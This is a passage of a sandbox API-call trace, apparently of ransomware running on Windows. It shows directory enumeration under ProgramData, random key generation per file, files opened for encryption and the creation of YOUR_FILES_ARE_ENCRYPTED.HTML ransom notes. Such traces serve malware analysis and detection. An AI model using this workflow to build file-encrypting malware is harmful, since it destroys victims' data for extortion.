pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter") returned 38 [0107.248] GetProcessHeap () returned 0x600000 [0107.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.248] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter") returned="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter" [0107.248] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\*" [0107.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.249] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.249] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 1 [0107.249] StrStrIW (lpFirst="MessageStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.249] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore") returned 51 [0107.249] GetProcessHeap () returned 0x600000 [0107.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.250] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore" [0107.250] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\*" [0107.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.251] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.252] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0107.252] StrStrIW (lpFirst="edb.chk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.252] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edb.chk") returned 59 [0107.252] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0107.252] lstrlenW (lpString=".chk") returned 4 [0107.252] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0107.252] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="edb.log", cAlternateFileName="")) returned 1 [0107.252] StrStrIW (lpFirst="edb.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.252] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edb.log") returned 59 [0107.252] PathFindExtensionW (pszPath="edb.log") returned=".log" [0107.252] lstrlenW (lpString=".log") returned 4 [0107.252] PathFindExtensionW (pszPath="edb.log") returned=".log" [0107.252] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edb.log" (normalized: "c:\\programdata\\microsoft\\smsrouter\\messagestore\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.252] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0107.252] StrStrIW (lpFirst="edb00001.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.252] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log") returned 64 [0107.252] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0107.252] lstrlenW (lpString=".log") returned 4 [0107.252] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0107.252] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log" (normalized: "c:\\programdata\\microsoft\\smsrouter\\messagestore\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.252] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0107.252] StrStrIW (lpFirst="edbres00001.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.252] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edbres00001.jrs") returned 67 [0107.252] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0107.253] lstrlenW (lpString=".jrs") returned 4 [0107.253] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0107.253] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0107.253] StrStrIW (lpFirst="edbres00002.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.253] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edbres00002.jrs") returned 67 [0107.253] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0107.253] lstrlenW (lpString=".jrs") returned 4 [0107.253] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0107.253] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="edbtmp.log", cAlternateFileName="")) returned 1 [0107.253] StrStrIW (lpFirst="edbtmp.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.253] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log") returned 62 [0107.253] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0107.253] lstrlenW (lpString=".log") returned 4 [0107.253] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0107.253] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log" (normalized: "c:\\programdata\\microsoft\\smsrouter\\messagestore\\edbtmp.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.254] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 1 [0107.254] StrStrIW (lpFirst="SmsInterceptStore.db", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.254] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db") returned 72 [0107.254] PathFindExtensionW (pszPath="SmsInterceptStore.db") returned=".db" [0107.254] lstrlenW (lpString=".db") returned 3 [0107.254] PathFindExtensionW (pszPath="SmsInterceptStore.db") returned=".db" [0107.254] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.254] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db" (normalized: "c:\\programdata\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.254] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 0 [0107.255] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.255] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0107.255] GetProcessHeap () returned 0x600000 [0107.255] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\MessageStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\smsrouter\\messagestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0107.257] GetProcessHeap () returned 0x600000 [0107.257] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.257] GetProcessHeap () returned 0x600000 [0107.257] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.257] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 0 [0107.257] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.258] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0107.258] GetProcessHeap () returned 0x600000 [0107.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\SmsRouter\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\smsrouter\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0107.258] GetProcessHeap () returned 0x600000 [0107.258] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.258] GetProcessHeap () returned 0x600000 [0107.258] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.259] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0107.259] StrStrIW (lpFirst="User Account Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.259] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned 50 [0107.259] GetProcessHeap () returned 0x600000 [0107.259] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.260] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" [0107.260] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*" [0107.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0107.260] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.260] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x93038, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0107.260] StrStrIW (lpFirst="guest.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.260] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0107.260] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0107.260] lstrlenW (lpString=".bmp") returned 4 [0107.260] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0107.260] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0107.260] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=602168) returned 1 [0107.260] GetProcessHeap () returned 0x600000 [0107.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0107.262] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="C2") returned 2 [0107.262] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="F6") returned 2 [0107.262] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="6F") returned 2 [0107.262] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="92") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="90") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="ED") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="AA") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A1") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="08") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="CD") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="CC") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="3B") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="5C") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B4") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="ED") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="95") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="40") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="F4") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="86") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="E1") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="F4") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="7C") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="6D") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="39") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="47") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B7") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="BC") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="92") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="D5") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F3") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="2B") returned 2 [0107.263] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="62") returned 2 [0107.264] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" [0107.264] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.264] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0107.264] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="guest.png", cAlternateFileName="")) returned 1 [0107.264] StrStrIW (lpFirst="guest.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.264] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.png") returned 60 [0107.264] PathFindExtensionW (pszPath="guest.png") returned=".png" [0107.264] lstrlenW (lpString=".png") returned 4 [0107.264] PathFindExtensionW (pszPath="guest.png") returned=".png" [0107.264] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.264] CreateFileW 